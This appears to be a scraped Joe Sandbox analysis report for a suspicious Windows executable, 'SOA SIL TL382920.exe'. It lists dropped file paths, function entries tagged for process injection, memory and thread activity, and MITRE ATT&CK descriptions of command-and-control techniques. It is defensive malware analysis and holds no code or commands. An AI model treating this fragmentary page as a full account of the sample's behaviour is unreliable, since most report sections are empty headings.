Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SOA SIL TL382920.exe.log

C:\Users\user\AppData\Local\Temp\59F79305l7

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
SOA SIL TL382920.exe

Function 015704C0 Relevance: 3.7, Strings: 2, Instructions: 1163
COMMON

Function 01571111 Relevance: 3.5, Strings: 2, Instructions: 1001
COMMON

Function 0157F28D Relevance: 1.8, APIs: 1, Instructions: 324
processCOMMON

Function 0157F298 Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Function 0157EEF9 Relevance: 1.6, APIs: 1, Instructions: 120
injectionCOMMON

Function 0157EF00 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Function 0157F059 Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Function 0157F060 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Function 0157EDD8 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Function 0157EDD0 Relevance: 1.6, APIs: 1, Instructions: 102
memoryCOMMON

Function 0157E869 Relevance: 1.6, APIs: 1, Instructions: 98
threadCOMMON

Function 0157E870 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Function 0157E341 Relevance: 1.6, APIs: 1, Instructions: 77
threadCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre